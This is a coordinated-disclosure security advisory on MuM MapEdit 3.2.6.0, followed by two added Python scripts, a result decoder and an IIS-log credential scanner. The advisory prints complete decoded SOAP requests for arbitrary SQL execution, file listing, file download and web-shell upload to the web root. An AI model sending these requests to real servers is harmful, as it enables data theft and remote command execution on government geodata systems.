# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit

## Product

- Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH
- Product: MapEdit
- Affected software version: 3.2.6.0

MuM MapEdit publishes geodata to the internet and to intranets and is deployed by several municipal and regional government bodies to provide geodata to the public. It consists of a Silverlight client and a C#/.NET backend. The two communicate over HTTP(S) using NBFS (.NET Binary Format: SOAP), Microsoft's binary XML encoding for WCF messages.

Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD

## Status/Metrics/Identifier

- CVE-ID: tbd
- CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
- CVSS Score: 9.0

The CVSS score reflects that an authenticated attacker can upload a web shell and execute commands with the privileges of the web server user.

## Author/Credits

- Paul Baade (TÜV Rheinland i-sec GmbH)
- Sven Krewitt (TÜV Rheinland i-sec GmbH)

## Fixed Versions

According to MuM, all described vulnerabilities are fixed in version 6.2.74; some of them are reportedly already fixed in version 5.1.

## Authentication via GET Parameter

The application requires users to pass their credentials as GET parameters. Because query strings are written to web server and proxy logs, the credentials can be recovered from those logs. An example URL would be:

    /Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]

## Execution of arbitrary SQL commands on contained SQLite DBs

The application contains several SQLite databases. An authenticated user may send POST requests to the URL /Mum.Geo.Services/DataAccessService.svc. This service executes the SQL statement supplied in the request against the SQLite file named in the request; neither the file nor the statement is restricted server-side.
The content of the POST request is encoded in Microsoft's NBFS (.NET Binary Format: SOAP) and decodes to the following XML:

Request:
--------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action>
    <a:MessageID>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:MessageID>
    <a:SequenceAcknowledgement>
      <a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
    </a:SequenceAcknowledgement>
    <a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/DataAccessService.svc</a:To>
  </s:Header>
  <s:Body>
    <QueryData>
      <connection i:type="c:SQLiteConnection" xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite">
        <b:CurrentRepresentation>
          <b:CollectionFeatureClassName/>
          <b:Id>0</b:Id>
          <b:LineFeatureClassName/>
          <b:Name/>
          <b:PointFeatureClassName/>
          <b:PolygonFeatureClassName/>
        </b:CurrentRepresentation>
        <b:DbVersion>999</b:DbVersion>
        <b:Id>0</b:Id>
        <b:Name>SYSTEM</b:Name>
        <b:StorageSchemaType>Unknown</b:StorageSchemaType>
        <c:Filename>[path_to_MumGeoData]\System\System.db</c:Filename>
      </connection>
      <sql>select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption</sql>
      <queryDefinition xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <b:Columns/>
        <b:SRID>0</b:SRID>
      </queryDefinition>
      <parameterNames xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
      <parameterValues xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
      <startRow>1</startRow>
      <bufferSize>2000</bufferSize>
      <limit>0</limit>
    </QueryData>
  </s:Body>
</s:Envelope>
```

The node "Filename" selects which SQLite database on the system is opened, and the node "sql" carries the SQL statement that is executed against it. Responses are NBFS-encoded as well and decode to the following XML:

Response:
---------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:DataAccessService/QueryDataResponse</a:Action>
    <a:RelatesTo>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:RelatesTo>
  </s:Header>
  <s:Body>
    <QueryDataResponse>
      <QueryDataResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess">
          <c:Data>eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj</c:Data>
          <c:FetchedAllRows>true</c:FetchedAllRows>
          <c:ResultColumns>
            <c:DbColumnDefinition>
              <c:Caption>NAME</c:Caption>
              <c:DataType>DbString</c:DataType>
              <c:DefaultValue/>
              <c:IsNullable>false</c:IsNullable>
              <c:IsPrimaryKey>false</c:IsPrimaryKey>
              <c:Length>255</c:Length>
              <c:Name>NAME</c:Name>
              <c:Precision>0</c:Precision>
              <c:Scale>0</c:Scale>
            </c:DbColumnDefinition>
            <c:DbColumnDefinition>
              <c:Caption>CAPTION</c:Caption>
              <c:DataType>DbString</c:DataType>
              <c:DefaultValue/>
              <c:IsNullable>false</c:IsNullable>
              <c:IsPrimaryKey>false</c:IsPrimaryKey>
              <c:Length>255</c:Length>
              <c:Name>CAPTION</c:Name>
              <c:Precision>0</c:Precision>
              <c:Scale>0</c:Scale>
            </c:DbColumnDefinition>
            <c:DbColumnDefinition>
              <c:Caption>VERSION_SYSTEMDATA</c:Caption>
              <c:DataType>DbString</c:DataType>
              <c:DefaultValue/>
              <c:IsNullable>true</c:IsNullable>
              <c:IsPrimaryKey>false</c:IsPrimaryKey>
              <c:Length>40</c:Length>
              <c:Name>VERSION_SYSTEMDATA</c:Name>
              <c:Precision>0</c:Precision>
              <c:Scale>0</c:Scale>
            </c:DbColumnDefinition>
          </c:ResultColumns>
        </b:Parameter>
        <b:State>
          <b:Tags>
            <b:Item i:nil="true"/>
          </b:Tags>
          <b:ExceptionMessage/>
          <b:StackTrace/>
          <b:Succeeded>true</b:Succeeded>
        </b:State>
      </QueryDataResult>
    </QueryDataResponse>
  </s:Body>
</s:Envelope>
```

The "DbColumnDefinition" nodes describe the returned columns; the "Data" node carries the result rows as base64-encoded, zlib-compressed data. Decoded, it holds the single row that the SQL statement selects:

    GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc

The same result is obtained by querying the database locally:

    >sqlite3 System.db
    sqlite> select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption;
    GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc

## Arbitrary file manipulation

By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user can perform several file operations. The most interesting ones from an attacker's point of view are:

- "GetFileNames", which lists the files in a given folder
- "DownloadFile", which returns any file the web server user has read access to
- "UploadFile", which writes a file to any folder the web server user has write access to

The individual operations are documented in the subsections below. As in the SQL execution section, the request and response content has been decoded from NBFS for readability.

### File exploration

An authenticated user can list all files in a given folder by sending the following content to the IO service.
Request:
--------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:IO/GetFileNames</a:Action>
    <a:MessageID>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:MessageID>
    <a:SequenceAcknowledgement>
      <a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
    </a:SequenceAcknowledgement>
    <a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
  </s:Header>
  <s:Body>
    <GetFileNames>
      <path>[path_to_webroot]</path>
      <searchPattern>*.*</searchPattern>
      <recursive>false</recursive>
    </GetFileNames>
  </s:Body>
</s:Envelope>
```

Response:
---------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:IO/GetFileNamesResponse</a:Action>
    <a:RelatesTo>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:RelatesTo>
  </s:Header>
  <s:Body>
    <GetFileNamesResponse>
      <GetFileNamesResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.IO">
          <c:FileNames xmlns:d="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
            <d:string>clientaccesspolicy.xml</d:string>
            <d:string>crossdomain.xml</d:string>
            <d:string>iisstart.htm</d:string>
            <d:string>index.html</d:string>
            <d:string>index.php</d:string>
            <d:string>Thumbs.db</d:string>
            <d:string>web.config</d:string>
            <d:string>welcome.png</d:string>
          </c:FileNames>
          <c:Path>[path_to_webroot]</c:Path>
        </b:Parameter>
        <b:State>
          <b:Tags>
            <b:Item i:nil="true"/>
          </b:Tags>
          <b:ExceptionMessage/>
          <b:StackTrace/>
          <b:Succeeded>true</b:Succeeded>
        </b:State>
      </GetFileNamesResult>
    </GetFileNamesResponse>
  </s:Body>
</s:Envelope>
```

### Download of arbitrary files

The same web service can be abused to download any file that the web server user has read access to.

Request:
--------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:IO/DownloadFile</a:Action>
    <a:MessageID>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:MessageID>
    <a:SequenceAcknowledgement>
      <a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
    </a:SequenceAcknowledgement>
    <a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
  </s:Header>
  <s:Body>
    <DownloadFile>
      <filename>[path_to_webroot]\Mum.Geo.Services\Admin.html</filename>
    </DownloadFile>
  </s:Body>
</s:Envelope>
```

Response:
---------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:IO/DownloadFileResponse</a:Action>
    <a:RelatesTo>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:RelatesTo>
  </s:Header>
  <s:Body>
    <DownloadFileResponse>
      <DownloadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Server.Core.IO" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <b:Data>77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo=</b:Data>
        <b:FileNotFound>false</b:FileNotFound>
        <b:IsComplete>true</b:IsComplete>
      </DownloadFileResult>
    </DownloadFileResponse>
  </s:Body>
</s:Envelope>
```

The "Data" node is plain base64 here (unlike the QueryData result, there is no zlib layer) and decodes to the file contents:

```html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>Admin</title>
    <meta http-equiv="refresh" content="0; URL=Start.aspx?AdminMode=true"/>
</head>
<body>
  <p><a href="Start.aspx?AdminMode=true">Start Mum Administrator</a></p>
</body>
</html>
```

### Upload of arbitrary files

The web service can be abused to upload a file to any folder that the web server user has write access to. Because "serverFilename" is an absolute path chosen by the client, the attacker can place the file under the web root and then execute it simply by requesting it over HTTP.

Request:
--------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:IO/UploadFile</a:Action>
    <a:MessageID>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:MessageID>
    <a:SequenceAcknowledgement>
      <a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
    </a:SequenceAcknowledgement>
    <a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
  </s:Header>
  <s:Body>
    <UploadFile>
      <clientFilename/>
      <serverFilename>[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx</serverFilename>
      <temporaryServerFilename>[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626</temporaryServerFilename>
      <data>[...]</data>
      <append>false</append>
      <completed>true</completed>
    </UploadFile>
  </s:Body>
</s:Envelope>
```

The "data" node contains a base64-encoded, zlib-packed ASPX web shell (omitted here). Once written under the web root it can be used to issue arbitrary commands on the compromised host with the privileges of the web server user.
Response:
---------

```xml
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
  <s:Header>
    <a:Action s:mustUnderstand="1">urn:IO/UploadFileResponse</a:Action>
    <a:RelatesTo>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:RelatesTo>
  </s:Header>
  <s:Body>
    <UploadFileResponse>
      <UploadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <b:Parameter/>
        <b:State>
          <b:Tags>
            <b:Item i:nil="true"/>
          </b:Tags>
          <b:ExceptionMessage/>
          <b:StackTrace/>
          <b:Succeeded>true</b:Succeeded>
        </b:State>
      </UploadFileResult>
    </UploadFileResponse>
  </s:Body>
</s:Envelope>
```

## Base64 encoded Passwords

In the database file \MumGeoData\System\System.db, passwords are stored in the tables "user" and "connection". Both tables store the passwords in plain text with nothing more than base64 encoding applied. Base64 is an encoding, not a hash, so anyone who can read System.db (for example via the DownloadFile or QueryData operations described above) recovers every cleartext password. Example:

    sqlite> select * from user where name='MUM';
    <User GUID>|MUM|<base64 encoded password>|1||

## Remark about information disclosures

Observing the communication between a MapEdit Silverlight client and its backend server, various pieces of information could be gathered, in particular file paths and license keys. Additionally, the error messages the server generates disclose a great deal about the backend parsing process.

## History

- 2016-06-07 Discovery of the mentioned vulnerabilities
- 2016-06-09 First contact with MuM
- 2016-06-23 Confirmation of the mentioned vulnerabilities
- 2016-07-29 Release of version 6.2.74
- 2016-09-13 Public disclosure
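As a worked example for the "Execution of arbitrary SQL commands" section, the following script decodes the "Data" node of the QueryDataResponse shown there end to end. It is an example added by the editor, not code from the advisory or from MuM; the base64 string is the one from the captured response, while the layout of the inflated bytes (a little-endian int32, then per cell a marker byte followed by a .NET-style length-prefixed string) was inferred from that single capture and is an assumption, not a documented format.

```python
"""Decode the "Data" node of a DataAccessService QueryDataResponse.

Editor's example, not part of the advisory or of MuM's software. The byte
layout below was inferred from the one captured response and is an assumption.
"""
import base64
import struct
import zlib

# "Data" value copied from the QueryDataResponse in the advisory
# (select name, caption, version_systemdata ... where name='TEST').
DATA_B64 = "eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj"


def inflate_data(b64: str) -> bytes:
    """Undo the two wrappers the service applies: base64, then zlib."""
    return zlib.decompress(base64.b64decode(b64))


def _read_7bit_length(buf: bytes, off: int):
    """Read a .NET BinaryWriter-style 7-bit encoded length prefix."""
    value = shift = 0
    while True:
        b = buf[off]
        off += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, off
        shift += 7


def parse_query_data(raw: bytes):
    """Split the inflated buffer into (leading_int32, [cell strings]).

    Observed layout (assumption from this one capture): a little-endian int32
    (1 here, presumably the row count), then per cell one marker byte (0x00
    for every cell in this capture) and a length-prefixed UTF-8 string.
    Any other marker value is reported rather than guessed at.
    """
    (count,) = struct.unpack_from("<i", raw, 0)
    off = 4
    cells = []
    while off < len(raw):
        marker = raw[off]
        off += 1
        if marker != 0x00:
            raise ValueError(f"unexpected cell marker 0x{marker:02x} at offset {off - 1}")
        length, off = _read_7bit_length(raw, off)
        cells.append(raw[off:off + length].decode("utf-8"))
        off += length
    return count, cells


def decode_query_result(b64: str, columns: int):
    """Return (leading_int32, rows), grouping cells by the column count
    taken from the ResultColumns node (3 in the advisory's response)."""
    count, cells = parse_query_data(inflate_data(b64))
    rows = [cells[i:i + columns] for i in range(0, len(cells), columns)]
    return count, rows


def as_pipe_rows(b64: str, columns: int):
    """Render rows the way sqlite3 prints them, for comparison with the advisory."""
    _, rows = decode_query_result(b64, columns)
    return ["|".join(r) for r in rows]


if __name__ == "__main__":
    for line in as_pipe_rows(DATA_B64, 3):
        print(line)
```

Running it prints the same row the advisory obtained from sqlite3 locally; the column count is read off the three DbColumnDefinition nodes, so the same decoder works for any SELECT the attacker issues.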
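For the "Authentication via GET Parameter" finding, the check an incident responder would run on an affected server: scan the IIS W3C logs for Start.aspx requests whose query string carries Username/Password, and redact those values before the logs are handed on. This is an added example, not part of the advisory; the log lines are constructed for illustration (only the Start.aspx path and the parameter names come from the advisory) and use a subset of the default IIS field list.

```python
"""Find and redact MapEdit credentials that the GET-parameter login leaves in IIS logs.

Editor's example, not part of the advisory. SAMPLE_LOG is constructed; it
follows the IIS W3C format with a subset of the default fields.
"""
import re
from urllib.parse import parse_qs

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2016-06-07 09:12:01 10.0.0.5 GET /Mum.Geo.Services/Start.aspx AutoUrl=1&Username=TEST&Password=TEST 80 - 10.0.0.77 Mozilla/5.0 200
2016-06-07 09:12:02 10.0.0.5 POST /Mum.Geo.Services/DataAccessService.svc - 80 - 10.0.0.77 Mozilla/5.0 200
2016-06-07 09:15:44 10.0.0.5 GET /Mum.Geo.Services/Start.aspx AutoUrl=1&Username=admin&Password=s3cret%21 80 - 192.0.2.9 Mozilla/5.0 200
2016-06-07 09:16:10 10.0.0.5 GET /index.html - 80 - 10.0.0.78 Mozilla/5.0 200
"""


def parse_iis_w3c(text: str):
    """Yield one dict per record, using the most recent #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed record
        yield dict(zip(fields, values))


def find_leaked_logins(text: str):
    """Return one finding per request that carried a password in its query string.

    The password itself is deliberately not copied into the finding.
    """
    hits = []
    for rec in parse_iis_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
        if "password" in params:
            hits.append({
                "time": f"{rec['date']} {rec['time']}",
                "client": rec["c-ip"],
                "path": rec["cs-uri-stem"],
                "username": params.get("username", [""])[0],
            })
    return hits


# Matches Username=... / Password=... up to the next '&' or whitespace.
_SECRET_RE = re.compile(r"(?i)((?:password|username)=)[^&\s]*")


def redact_log(text: str) -> str:
    """Blank credential values in every record line; directive lines are kept."""
    return "\n".join(
        line if line.startswith("#") else _SECRET_RE.sub(r"\1[REDACTED]", line)
        for line in text.splitlines()
    )


if __name__ == "__main__":
    for hit in find_leaked_logins(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} -> {hit['path']} as {hit['username']!r}")
    print(redact_log(SAMPLE_LOG))
```

The same pattern applies to reverse-proxy logs in front of the server; the field list just changes. Redaction is a stop-gap for logs already written, the fix is moving the credentials out of the URL.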